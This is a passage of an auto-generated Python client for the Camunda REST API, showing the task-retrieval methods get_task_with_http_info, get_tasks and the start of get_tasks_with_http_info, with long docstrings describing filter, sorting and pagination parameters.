asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_task_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: The id of the task to be retrieved. (required)
:param _return_http_data_only: return the response data only, without
the HTTP status code and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If a single
number is provided, it is used as the total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(TaskDto, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'id'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_task" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `get_task`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/task/{id}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='TaskDto', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
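# Illustrative sketch (hypothetical id; attribute names assume the
# generated TaskDto model):
#
#     task = api.get_task("aTaskId")
#     print(task.name, task.assignee, task.due)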
def get_tasks(self, **kwargs): # noqa: E501
"""get_tasks # noqa: E501
Queries for tasks that fulfill a given filter. The size of the result set can be retrieved by using the Get Task Count method. **Security Consideration:** There are several query parameters (such as assigneeExpression) for specifying an EL expression. These are disabled by default to prevent remote code execution. See the section on [security considerations](https://docs.camunda.org/manual/7.13/user-guide/process-engine/securing-custom-code/) for custom code in the user guide for details. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_tasks(async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str process_instance_id: Restrict to tasks that belong to process instances with the given id.
:param str process_instance_id_in: Restrict to tasks that belong to process instances with the given ids.
:param str process_instance_business_key: Restrict to tasks that belong to process instances with the given business key.
:param str process_instance_business_key_expression: Restrict to tasks that belong to process instances with the given business key which is described by an expression. See the [user guide](https://docs.camunda.org/manual/7.13/user-guide/process-engine/expression-language/#internal-context-functions) for more information on available functions.
:param str process_instance_business_key_in: Restrict to tasks that belong to process instances with one of the given business keys. The keys need to be in a comma-separated list.
:param str process_instance_business_key_like: Restrict to tasks that have a process instance business key that has the parameter value as a substring.
:param str process_instance_business_key_like_expression: Restrict to tasks that have a process instance business key that has the parameter value as a substring and is described by an expression. See the [user guide](https://docs.camunda.org/manual/7.13/user-guide/process-engine/expression-language/#internal-context-functions) for more information on available functions.
:param str process_definition_id: Restrict to tasks that belong to a process definition with the given id.
:param str process_definition_key: Restrict to tasks that belong to a process definition with the given key.
:param str process_definition_key_in: Restrict to tasks that belong to a process definition with one of the given keys. The keys need to be in a comma-separated list.
:param str process_definition_name: Restrict to tasks that belong to a process definition with the given name.
:param str process_definition_name_like: Restrict to tasks that have a process definition name that has the parameter value as a substring.
:param str execution_id: Restrict to tasks that belong to an execution with the given id.
:param str case_instance_id: Restrict to tasks that belong to case instances with the given id.
:param str case_instance_business_key: Restrict to tasks that belong to case instances with the given business key.
:param str case_instance_business_key_like: Restrict to tasks that have a case instance business key that has the parameter value as a substring.
:param str case_definition_id: Restrict to tasks that belong to a case definition with the given id.
:param str case_definition_key: Restrict to tasks that belong to a case definition with the given key.
:param str case_definition_name: Restrict to tasks that belong to a case definition with the given name.
:param str case_definition_name_like: Restrict to tasks that have a case definition name that has the parameter value as a substring.
:param str case_execution_id: Restrict to tasks that belong to a case execution with the given id.
:param str activity_instance_id_in: Only include tasks which belong to one of the passed and comma-separated activity instance ids.
:param str tenant_id_in: Only include tasks which belong to one of the passed and comma-separated tenant ids.
:param bool without_tenant_id: Only include tasks which belong to no tenant. Value may only be `true`, as `false` is the default behavior.
:param str assignee: Restrict to tasks that the given user is assigned to.
:param str assignee_expression: Restrict to tasks that the user described by the given expression is assigned to. See the [user guide](https://docs.camunda.org/manual/7.13/user-guide/process-engine/expression-language/#internal-context-functions) for more information on available functions.
:param str assignee_like: Restrict to tasks that have an assignee that has the parameter value as a substring.
:param str assignee_like_expression: Restrict to tasks that have an assignee that has the parameter value described by the given expression as a substring. See the [user guide](https://docs.camunda.org/manual/7.13/user-guide/process-engine/expression-language/#internal-context-functions) for more information on available functions.
:param str assignee_in: Only include tasks which are assigned to one of the passed and comma-separated user ids.
:param str owner: Restrict to tasks that the given user owns.
:param str owner_expression: Restrict to tasks that the user described by the given expression owns. See the [user guide](https://docs.camunda.org/manual/7.13/user-guide/process-engine/expression-language/#internal-context-functions) for more information on available functions.
:param str candidate_group: Only include tasks that are offered to the given group.
:param str candidate_group_expression: Only include tasks that are offered to the group described by the given expression. See the [user guide](https://docs.camunda.org/manual/7.13/user-guide/process-engine/expression-language/#internal-context-functions) for more information on available functions.
:param str candidate_user: Only include tasks that are offered to the given user or to one of their groups.
:param str candidate_user_expression: Only include tasks that are offered to the user described by the given expression. See the [user guide](https://docs.camunda.org/manual/7.13/user-guide/process-engine/expression-language/#internal-context-functions) for more information on available functions.
:param bool include_assigned_tasks: Also include tasks that are assigned to users in candidate queries. Default is to only include tasks that are not assigned to any user if you query by candidate user or group(s).
:param str involved_user: Only include tasks that the given user is involved in. A user is involved in a task if an identity link exists between task and user (e.g., the user is the assignee).
:param str involved_user_expression: Only include tasks that the user described by the given expression is involved in. A user is involved in a task if an identity link exists between task and user (e.g., the user is the assignee). See the [user guide](https://docs.camunda.org/manual/7.13/user-guide/process-engine/expression-language/#internal-context-functions) for more information on available functions.
:param bool assigned: If set to `true`, restricts the query to all tasks that are assigned.
:param bool unassigned: If set to `true`, restricts the query to all tasks that are unassigned.
:param str task_definition_key: Restrict to tasks that have the given key.
:param str task_definition_key_in: Restrict to tasks that have one of the given keys. The keys need to be in a comma-separated list.
:param str task_definition_key_like: Restrict to tasks that have a key that has the parameter value as a substring.
:param str name: Restrict to tasks that have the given name.
:param str name_not_equal: Restrict to tasks that do not have the given name.
:param str name_like: Restrict to tasks that have a name with the given parameter value as substring.
:param str name_not_like: Restrict to tasks that do not have a name with the given parameter value as substring.
:param str description: Restrict to tasks that have the given description.
:param str description_like: Restrict to tasks that have a description that has the parameter value as a substring.
:param int priority: Restrict to tasks that have the given priority.
:param int max_priority: Restrict to tasks that have a lower or equal priority.
:param int min_priority: Restrict to tasks that have a higher or equal priority.
:param str due_date: Restrict to tasks that are due on the given date. By [default](https://docs.camunda.org/manual/7.13/reference/rest/overview/date-format/), the date must have the format `yyyy-MM-dd'T'HH:mm:ss.SSSZ`, e.g., `2013-01-23T14:42:45.546+0200`.
:param str due_date_expression: Restrict to tasks that are due on the date described by the given expression. See the [User Guide](https://docs.camunda.org/manual/7.13/user-guide/process-engine/expression-language/#internal-context-functions) for more information on available functions. The expression must evaluate to a `java.util.Date` or `org.joda.time.DateTime` object.
:param str due_after: Restrict to tasks that are due after the given date. By [default](https://docs.camunda.org/manual/7.13/reference/rest/overview/date-format/), the date must have the format `yyyy-MM-dd'T'HH:mm:ss.SSSZ`, e.g., `2013-01-23T14:42:45.435+0200`.
:param str due_after_expression: Restrict to tasks that are due after the date described by the given expression. See the [user guide](https://docs.camunda.org/manual/7.13/user-guide/process-engine/expression-language/#internal-context-functions) for more information on available functions. The expression must evaluate to a `java.util.Date` or `org.joda.time.DateTime` object.
:param str due_before: Restrict to tasks that are due before the given date. By [default](https://docs.camunda.org/manual/7.13/reference/rest/overview/date-format/), the date must have the format `yyyy-MM-dd'T'HH:mm:ss.SSSZ`, e.g., `2013-01-23T14:42:45.243+0200`.
:param str due_before_expression: Restrict to tasks that are due before the date described by the given expression. See the [user guide](https://docs.camunda.org/manual/7.13/user-guide/process-engine/expression-language/#internal-context-functions) for more information on available functions. The expression must evaluate to a `java.util.Date` or `org.joda.time.DateTime` object.
:param str follow_up_date: Restrict to tasks that have a followUp date on the given date. By [default](https://docs.camunda.org/manual/7.13/reference/rest/overview/date-format/), the date must have the format `yyyy-MM-dd'T'HH:mm:ss.SSSZ`, e.g., `2013-01-23T14:42:45.342+0200`.
:param str follow_up_date_expression: Restrict to tasks that have a followUp date on the date described by the given expression. See the [user guide](https://docs.camunda.org/manual/7.13/user-guide/process-engine/expression-language/#internal-context-functions) for more information on available functions. The expression must evaluate to a `java.util.Date` or `org.joda.time.DateTime` object.
:param str follow_up_after: Restrict to tasks that have a followUp date after the given date. By [default](https://docs.camunda.org/manual/7.13/reference/rest/overview/date-format/), the date must have the format `yyyy-MM-dd'T'HH:mm:ss.SSSZ`, e.g., `2013-01-23T14:42:45.542+0200`.
:param str follow_up_after_expression: Restrict to tasks that have a followUp date after the date described by the given expression. See the [user guide](https://docs.camunda.org/manual/7.13/user-guide/process-engine/expression-language/#internal-context-functions) for more information on available functions. The expression must evaluate to a `java.util.Date` or `org.joda.time.DateTime` object.
:param str follow_up_before: Restrict to tasks that have a followUp date before the given date. By [default](https://docs.camunda.org/manual/7.13/reference/rest/overview/date-format/), the date must have the format `yyyy-MM-dd'T'HH:mm:ss.SSSZ`, e.g., `2013-01-23T14:42:45.234+0200`.
:param str follow_up_before_expression: Restrict to tasks that have a followUp date before the date described by the given expression. See the [user guide](https://docs.camunda.org/manual/7.13/user-guide/process-engine/expression-language/#internal-context-functions) for more information on available functions. The expression must evaluate to a `java.util.Date` or `org.joda.time.DateTime` object.
:param str follow_up_before_or_not_existent: Restrict to tasks that have no followUp date or a followUp date before the given date. By [default](https://docs.camunda.org/manual/7.13/reference/rest/overview/date-format/), the date must have the format `yyyy-MM-dd'T'HH:mm:ss.SSSZ`, e.g., `2013-01-23T14:42:45.432+0200`. The typical use case is to query all `active` tasks for a user for a given date.
:param str follow_up_before_or_not_existent_expression: Restrict to tasks that have no followUp date or a followUp date before the date described by the given expression. See the [user guide](https://docs.camunda.org/manual/7.13/user-guide/process-engine/expression-language/#internal-context-functions) for more information on available functions. The expression must evaluate to a `java.util.Date` or `org.joda.time.DateTime` object.
:param str created_on: Restrict to tasks that were created on the given date. By [default](https://docs.camunda.org/manual/7.13/reference/rest/overview/date-format/), the date must have the format `yyyy-MM-dd'T'HH:mm:ss.SSSZ`, e.g., `2013-01-23T14:42:45.324+0200`.
:param str created_on_expression: Restrict to tasks that were created on the date described by the given expression. See the [user guide](https://docs.camunda.org/manual/7.13/user-guide/process-engine/expression-language/#internal-context-functions) for more information on available functions. The expression must evaluate to a `java.util.Date` or `org.joda.time.DateTime` object.
:param str created_after: Restrict to tasks that were created after the given date. By [default](https://docs.camunda.org/manual/7.13/reference/rest/overview/date-format/), the date must have the format `yyyy-MM-dd'T'HH:mm:ss.SSSZ`, e.g., `2013-01-23T14:42:45.342+0200`.
:param str created_after_expression: Restrict to tasks that were created after the date described by the given expression. See the [user guide](https://docs.camunda.org/manual/7.13/user-guide/process-engine/expression-language/#internal-context-functions) for more information on available functions. The expression must evaluate to a `java.util.Date` or `org.joda.time.DateTime` object.
:param str created_before: Restrict to tasks that were created before the given date. By [default](https://docs.camunda.org/manual/7.13/reference/rest/overview/date-format/), the date must have the format `yyyy-MM-dd'T'HH:mm:ss.SSSZ`, e.g., `2013-01-23T14:42:45.332+0200`.
:param str created_before_expression: Restrict to tasks that were created before the date described by the given expression. See the [user guide](https://docs.camunda.org/manual/7.13/user-guide/process-engine/expression-language/#internal-context-functions) for more information on available functions. The expression must evaluate to a `java.util.Date` or `org.joda.time.DateTime` object.
:param str delegation_state: Restrict to tasks that are in the given delegation state. Valid values are `PENDING` and `RESOLVED`.
:param str candidate_groups: Restrict to tasks that are offered to any of the given candidate groups. Takes a comma-separated list of group names, so for example `developers,support,sales`.
:param str candidate_groups_expression: Restrict to tasks that are offered to any of the candidate groups described by the given expression. See the [user guide](https://docs.camunda.org/manual/7.13/user-guide/process-engine/expression-language/#internal-context-functions) for more information on available functions. The expression must evaluate to `java.util.List` of Strings.
:param bool with_candidate_groups: Only include tasks which have a candidate group. Value may only be `true`, as `false` is the default behavior.
:param bool without_candidate_groups: Only include tasks which have no candidate group. Value may only be `true`, as `false` is the default behavior.
:param bool with_candidate_users: Only include tasks which have a candidate user. Value may only be `true`, as `false` is the default behavior.
:param bool without_candidate_users: Only include tasks which have no candidate users. Value may only be `true`, as `false` is the default behavior.
:param bool active: Only include active tasks. Value may only be `true`, as `false` is the default behavior.
:param bool suspended: Only include suspended tasks. Value may only be `true`, as `false` is the default behavior.
:param str task_variables: Only include tasks that have variables with certain values. Variable filtering expressions are comma-separated and are structured as follows: A valid parameter value has the form `key_operator_value`. `key` is the variable name, `operator` is the comparison operator to be used and `value` the variable value. **Note**: Values are always treated as String objects on server side. Valid `operator` values are: `eq` - equal to; `neq` - not equal to; `gt` - greater than; `gteq` - greater than or equal to; `lt` - lower than; `lteq` - lower than or equal to; `like`. `key` and `value` may not contain underscore or comma characters.
:param str process_variables: Only include tasks that belong to process instances that have variables with certain values. Variable filtering expressions are comma-separated and are structured as follows: A valid parameter value has the form `key_operator_value`. `key` is the variable name, `operator` is the comparison operator to be used and `value` the variable value. **Note**: Values are always treated as String objects on server side. Valid `operator` values are: `eq` - equal to; `neq` - not equal to; `gt` - greater than; `gteq` - greater than or equal to; `lt` - lower than; `lteq` - lower than or equal to; `like`. `key` and `value` may not contain underscore or comma characters.
:param str case_instance_variables: Only include tasks that belong to case instances that have variables with certain values. Variable filtering expressions are comma-separated and are structured as follows: A valid parameter value has the form `key_operator_value`. `key` is the variable name, `operator` is the comparison operator to be used and `value` the variable value. **Note**: Values are always treated as String objects on server side. Valid `operator` values are: `eq` - equal to; `neq` - not equal to; `gt` - greater than; `gteq` - greater than or equal to; `lt` - lower than; `lteq` - lower than or equal to; `like`. `key` and `value` may not contain underscore or comma characters.
:param bool variable_names_ignore_case: Match all variable names in this query case-insensitively. If set, `variableName` and `variablename` are treated as equal.
:param bool variable_values_ignore_case: Match all variable values in this query case-insensitively. If set, `variableValue` and `variablevalue` are treated as equal.
:param str parent_task_id: Restrict query to all tasks that are sub tasks of the given task. Takes a task id.
:param str sort_by: Sort the results lexicographically by a given criterion. Must be used in conjunction with the sortOrder parameter.
:param str sort_order: Sort the results in a given order. Values may be asc for ascending order or desc for descending order. Must be used in conjunction with the sortBy parameter.
:param int first_result: Pagination of results. Specifies the index of the first result to return.
:param int max_results: Pagination of results. Specifies the maximum number of results to return. Will return fewer results if no more results are available.
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If a single
number is provided, it is used as the total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: list[TaskDto]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_tasks_with_http_info(**kwargs) # noqa: E501
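# Illustrative sketch (hypothetical filter values): combining filters,
# sorting, and pagination in a single query.
#
#     tasks = api.get_tasks(
#         assignee="demo",
#         process_definition_key="invoice",
#         sort_by="dueDate", sort_order="asc",
#         first_result=0, max_results=50)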
def get_tasks_with_http_info(self, **kwargs): # noqa: E501
"""get_tasks # noqa: E501
Queries for tasks that fulfill a given filter. The size of the result set can be retrieved by using the Get Task Count method. **Security Consideration:** There are several query parameters (such as assigneeExpression) for specifying an EL expression. These are disabled by default to prevent remote code execution. See the section on [security considerations](https://docs.camunda.org/manual/7.13/user-guide/process-engine/securing-custom-code/) for custom code in the user guide for details. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_tasks_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str process_instance_id: Restrict to tasks that belong to process instances with the given id.
:param str process_instance_id_in: Restrict to tasks that belong to process instances with the given ids.
:param str process_instance_business_key: Restrict to tasks that belong to process instances with the given business key.
:param str process_instance_business_key_expression: Restrict to tasks that belong to process instances with the given business key which is described by an expression. See the [user guide](https://docs.camunda.org/manual/7.13/user-guide/process-engine/expression-language/#internal-context-functions) for more information on available functions.
:param str process_instance_business_key_in: Restrict to tasks that belong to process instances with one of the given business keys. The keys need to be in a comma-separated list.
:param str process_instance_business_key_like: Restrict to tasks that have a process instance business key that has the parameter value as a substring.
:param str process_instance_business_key_like_expression: Restrict to tasks that have a process instance business key that has the parameter value as a substring and is described by an expression. See the [user guide](https://docs.camunda.org/manual/7.13/user-guide/process-engine/expression-language/#internal-context-functions) for more information on available functions.
:param str process_definition_id: Restrict to tasks that belong to a process definition with the given id.
:param str process_definition_key: Restrict to tasks that belong to a process definition with the given key.
:param str process_definition_key_in: Restrict to tasks that belong to a process definition with one of the given keys. The keys need to be in a comma-separated list.
:param str process_definition_name: Restrict to tasks that belong to a process definition with the given name.
:param str process_definition_name_like: Restrict to tasks that have a process definition name that has the parameter value as a substring.
:param str execution_id: Restrict to tasks that belong to an execution with the given id.
:param str case_instance_id: Restrict to tasks that belong to case instances with the given id.
:param str case_instance_business_key: Restrict to tasks that belong to case instances with the given business key.
:param str case_instance_business_key_like: Restrict to tasks that have a case instance business key that has the parameter value as a substring.
:param str case_definition_id: Restrict to tasks that belong to a case definition with the given id.
:param str case_definition_key: Restrict to tasks that belong to a case definition with the given key.
:param str case_definition_name: Restrict to tasks that belong to a case definition with the given name.
:param str case_definition_name_like: Restrict to tasks that have a case definition name that has the parameter value as a substring.
:param str case_execution_id: Restrict to tasks that belong to a case execution with the given id.
:param str activity_instance_id_in: Only include tasks which belong to one of the passed and comma-separated activity instance ids.
:param str tenant_id_in: Only include tasks which belong to one of the passed and comma-separated tenant ids.
:param bool without_tenant_id: Only include tasks which belong to no tenant. Value may only be `true`, as `false` is the default behavior.
:param str assignee: Restrict to tasks that the given user is assigned to.
:param str assignee_expression: Restrict to tasks that the user described by the given expression is assigned to. See the [user guide](https://docs.camunda.org/manual/7.13/user-guide/process-engine/expression-language/#internal-context-functions) for more information on available functions.
:param str assignee_like: Restrict to tasks that have an assignee that has the parameter value as a substring.
:param str assignee_like_expression: Restrict to tasks that have an assignee that has the parameter value described by the given expression as a substring. See the [user guide](https://docs.camunda.org/manual/7.13/user-guide/process-engine/expression-language/#internal-context-functions) for more information on available functions.
:param str assignee_in: Only include tasks which are assigned to one of the passed and comma-separated user ids.
:param str owner: Restrict to tasks that the given user owns.
:param str owner_expression: Restrict to tasks that the user described by the given expression owns. See the [user guide](https://docs.camunda.org/manual/7.13/user-guide/process-engine/expression-language/#internal-context-functions) for more information on available functions.
:param str candidate_group: Only include tasks that are offered to the given group.
:param str candidate_group_expression: Only include tasks that are offered to the group described by the given expression. See the [user guide](https://docs.camunda.org/manual/7.13/user-guide/process-engine/expression-language/#internal-context-functions) for more information on available functions.
:param str candidate_user: Only include tasks that are offered to the given user or to one of their groups.
:param str candidate_user_expression: Only include tasks that are offered to the user described by the given expression. See the [user guide](https://docs.camunda.org/manual/7.13/user-guide/process-engine/expression-language/#internal-context-functions) for more information on available functions.
:param bool include_assigned_tasks: Also include tasks that are assigned to users in candidate queries. Default is to only include tasks that are not assigned to any user if you query by candidate user or group(s).
:param str involved_user: Only include tasks that the given user is involved in. A user is involved in a task if an identity link exists between task and user (e.g., the user is the assignee).
:param str involved_user_expression: Only include tasks that the user described by the given expression is involved in. A user is involved in a task if an identity link exists between task and user (e.g., the user is the assignee). See the [user guide](https://docs.camunda.org/manual/7.13/user-guide/process-engine/expression-language/#internal-context-functions) for more information on available functions.
:param bool assigned: If set to `true`, restricts the query to all tasks that are assigned.
:param bool unassigned: If set to `true`, restricts the query to all tasks that are unassigned.
:param str task_definition_key: Restrict to tasks that have the given key.
:param str task_definition_key_in: Restrict to tasks that have one of the given keys. The keys need to be in a comma-separated list.
:param str task_definition_key_like: Restrict to tasks that have a key that has the parameter value as a substring.
:param str name: Restrict to tasks that have the given name.
:param str name_not_equal: Restrict to tasks that do not have the given name.
:param str name_like: Restrict to tasks that have a name with the given parameter value as substring.
:param str name_not_like: Restrict to tasks that do not have a name with the given parameter value as substring.
:param str description: Restrict to tasks that have the given description.
:param str description_like: Restrict to tasks that have a description that has the parameter value as a substring.
:param int priority: Restrict to tasks that have the given priority.
:param int max_priority: Restrict to tasks that have a priority lower than or equal to the given value.
:param int min_priority: Restrict to tasks that have a priority higher than or equal to the given value.
:param str due_date: Restrict to tasks that are due on the given date. By [default](https://docs.camunda.org/manual/7.13/reference/rest/overview/date-format/), the date must have the format `yyyy-MM-dd'T'HH:mm:ss.SSSZ`, e.g., `2013-01-23T14:42:45.546+0200`.
:param str due_date_expression: Restrict to tasks that are due on the date described by the given expression. See the [User Guide](https://docs.camunda.org/manual/7.13/user-guide/process-engine/expression-language/#internal-context-functions) for more information on available functions. The expression must evaluate to a `java.util.Date` or `org.joda.time.DateTime` object.
:param str due_after: Restrict to tasks that are due after the given date. By [default](https://docs.camunda.org/manual/7.13/reference/rest/overview/date-format/), the date must have the format `yyyy-MM-dd'T'HH:mm:ss.SSSZ`, e.g., `2013-01-23T14:42:45.435+0200`.
:param str due_after_expression: Restrict to tasks that are due after the date described by the given expression. See the [user guide](https://docs.camunda.org/manual/7.13/user-guide/process-engine/expression-language/#internal-context-functions) for more information on available functions. The expression must evaluate to a `java.util.Date` or `org.joda.time.DateTime` object.
:param str due_before: Restrict to tasks that are due before the given date. By [default](https://docs.camunda.org/manual/7.13/reference/rest/overview/date-format/), the date must have the format `yyyy-MM-dd'T'HH:mm:ss.SSSZ`, e.g., `2013-01-23T14:42:45.243+0200`.
:param str due_before_expression: Restrict to tasks that are due before the date described by the given expression. See the [user guide](https://docs.camunda.org/manual/7.13/user-guide/process-engine/expression-language/#internal-context-functions) for more information on available functions. The expression must evaluate to a `java.util.Date` or `org.joda.time.DateTime` object.
:param str follow_up_date: Restrict to tasks that have a followUp date on the given date. By [default](https://docs.camunda.org/manual/7.13/reference/rest/overview/date-format/), the date must have the format `yyyy-MM-dd'T'HH:mm:ss.SSSZ`, e.g., `2013-01-23T14:42:45.342+0200`.
:param str follow_up_date_expression: Restrict to tasks that have a followUp date on the date described by the given expression. See the [user guide](https://docs.camunda.org/manual/7.13/user-guide/process-engine/expression-language/#internal-context-functions) for more information on available functions. The expression must evaluate to a `java.util.Date` or `org.joda.time.DateTime` object.
:param str follow_up_after: Restrict to tasks that have a followUp date after the given date. By [default](https://docs.camunda.org/manual/7.13/reference/rest/overview/date-format/), the date must have the format `yyyy-MM-dd'T'HH:mm:ss.SSSZ`, e.g., `2013-01-23T14:42:45.542+0200`.
:param str follow_up_after_expression: Restrict to tasks that have a followUp date after the date described by the given expression. See the [user guide](https://docs.camunda.org/manual/7.13/user-guide/process-engine/expression-language/#internal-context-functions) for more information on available functions. The expression must evaluate to a `java.util.Date` or `org.joda.time.DateTime` object.
:param str follow_up_before: Restrict to tasks that have a followUp date before the given date. By [default](https://docs.camunda.org/manual/7.13/reference/rest/overview/date-format/), the date must have the format `yyyy-MM-dd'T'HH:mm:ss.SSSZ`, e.g., `2013-01-23T14:42:45.234+0200`.
:param str follow_up_before_expression: Restrict to tasks that have a followUp date before the date described by the given expression. See the [user guide](https://docs.camunda.org/manual/7.13/user-guide/process-engine/expression-language/#internal-context-functions) for more information on available functions. The expression must evaluate to a `java.util.Date` or `org.joda.time.DateTime` object.
:param str follow_up_before_or_not_existent: Restrict to tasks that have no followUp date or a followUp date before the given date. By [default](https://docs.camunda.org/manual/7.13/reference/rest/overview/date-format/), the date must have the format `yyyy-MM-dd'T'HH:mm:ss.SSSZ`, e.g., `2013-01-23T14:42:45.432+0200`. The typical use case is to query all `active` tasks for a user for a given date.
:param str follow_up_before_or_not_existent_expression: Restrict to tasks that have no followUp date or a followUp date before the date described by the given expression. See the [user guide](https://docs.camunda.org/manual/7.13/user-guide/process-engine/expression-language/#internal-context-functions) for more information on available functions. The expression must evaluate to a `java.util.Date` or `org.joda.time.DateTime` object.
:param str created_on: Restrict to tasks that were created on the given date. By [default](https://docs.camunda.org/manual/7.13/reference/rest/overview/date-format/), the date must have the format `yyyy-MM-dd'T'HH:mm:ss.SSSZ`, e.g., `2013-01-23T14:42:45.324+0200`.
:param str created_on_expression: Restrict to tasks that were created on the date described by the given expression. See the [user guide](https://docs.camunda.org/manual/7.13/user-guide/process-engine/expression-language/#internal-context-functions) for more information on available functions. The expression must evaluate to a `java.util.Date` or `org.joda.time.DateTime` object.
:param str created_after: Restrict to tasks that were created after the given date. By [default](https://docs.camunda.org/manual/7.13/reference/rest/overview/date-format/), the date must have the format `yyyy-MM-dd'T'HH:mm:ss.SSSZ`, e.g., `2013-01-23T14:42:45.342+0200`.
:param str created_after_expression: Restrict to tasks that were created after the date described by the given expression. See the [user guide](https://docs.camunda.org/manual/7.13/user-guide/process-engine/expression-language/#internal-context-functions) for more information on available functions. The expression must evaluate to a `java.util.Date` or `org.joda.time.DateTime` object.
:param str created_before: Restrict to tasks that were created before the given date. By [default](https://docs.camunda.org/manual/7.13/reference/rest/overview/date-format/), the date must have the format `yyyy-MM-dd'T'HH:mm:ss.SSSZ`, e.g., `2013-01-23T14:42:45.332+0200`.
:param str created_before_expression: Restrict to tasks that were created before the date described by the given expression. See the [user guide](https://docs.camunda.org/manual/7.13/user-guide/process-engine/expression-language/#internal-context-functions) for more information on available functions. The expression must evaluate to a `java.util.Date` or `org.joda.time.DateTime` object.
:param str delegation_state: Restrict to tasks that are in the given delegation state. Valid values are `PENDING` and `RESOLVED`.
:param str candidate_groups: Restrict to tasks that are offered to any of the given candidate groups. Takes a comma-separated list of group names, for example `developers,support,sales`.
:param str candidate_groups_expression: Restrict to tasks that are offered to any of the candidate groups described by the given expression. See the [user guide](https://docs.camunda.org/manual/7.13/user-guide/process-engine/expression-language/#internal-context-functions) for more information on available functions. The expression must evaluate to `java.util.List` of Strings.
:param bool with_candidate_groups: Only include tasks which have a candidate group. Value may only be `true`, as `false` is the default behavior.
:param bool without_candidate_groups: Only include tasks which have no candidate group. Value may only be `true`, as `false` is the default behavior.
:param bool with_candidate_users: Only include tasks which have a candidate user. Value may only be `true`, as `false` is the default behavior.
:param bool without_candidate_users: Only include tasks which have no candidate users. Value may only be `true`, as `false` is the default behavior.
:param bool active: Only include active tasks. Value may only be `true`, as `false` is the default behavior.
:param bool suspended: Only include suspended tasks. Value may only be `true`, as `false` is the default behavior.
:param str task_variables: Only include tasks that have variables with certain values. Variable filtering expressions are comma-separated and are structured as follows: A valid parameter value has the form `key_operator_value`. `key` is the variable name, `operator` is the comparison operator to be used and `value` the variable value. **Note**: Values are always treated as String objects on server side. Valid `operator` values are: `eq` - equal to; `neq` - not equal to; `gt` - greater than; `gteq` - greater than or equal to; `lt` - lower than; `lteq` - lower than or equal to; `like`. `key` and `value` may not contain underscore or comma characters.
:param str process_variables: Only include tasks that belong to process instances that have variables with certain values. Variable filtering expressions are comma-separated and are structured as follows: A valid parameter value has the form `key_operator_value`. `key` is the variable name, `operator` is the comparison operator to be used and `value` the variable value. **Note**: Values are always treated as String objects on server side. Valid `operator` values are: `eq` - equal to; `neq` - not equal to; `gt` - greater than; `gteq` - greater than or equal to; `lt` - lower than; `lteq` - lower than or equal to; `like`. `key` and `value` may not contain underscore or comma characters.
:param str case_instance_variables: Only include tasks that belong to case instances that have variables with certain values. Variable filtering expressions are comma-separated and are structured as follows: A valid parameter value has the form `key_operator_value`. `key` is the variable name, `operator` is the comparison operator to be used and `value` the variable value. **Note**: Values are always treated as String objects on server side. Valid `operator` values are: `eq` - equal to; `neq` - not equal to; `gt` - greater than; `gteq` - greater than or equal to; `lt` - lower than; `lteq` - lower than or equal to; `like`. `key` and `value` may not contain underscore or comma characters.
:param bool variable_names_ignore_case: Match all variable names in this query case-insensitively. If set, `variableName` and `variablename` are treated as equal.
:param bool variable_values_ignore_case: Match all variable values in this query case-insensitively. If set, `variableValue` and `variablevalue` are treated as equal.
:param str parent_task_id: Restrict the query to all tasks that are subtasks of the given task. Takes a task id.
:param str sort_by: Sort the results lexicographically by a given criterion. Must be used in conjunction with the sortOrder parameter.
:param str sort_order: Sort the results in a given order. Values may be `asc` for ascending order or `desc` for descending order. Must be used in conjunction with the sortBy parameter.
:param int first_result: Pagination of results. Specifies the index of the first result to return.
:param int max_results: Pagination of results. Specifies the maximum number of results to return. Will return fewer results if there are no more results left.
:param _return_http_data_only: if True, return the response data only,
without the HTTP status code and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If a single
number is provided, it is used as the total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(list[TaskDto], status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
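A hedged usage sketch (the group name, variable filter, and date below are
made-up example values, not defaults):
>>> data, status, headers = api.get_tasks_with_http_info(
...     candidate_group='support',
...     unassigned=True,
...     process_variables='priority_gt_10',
...     created_after='2013-01-23T00:00:00.000+0200',
...     sort_by='created', sort_order='desc',
...     first_result=0, max_results=50)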
"""
local_var_params = locals()
all_params = [
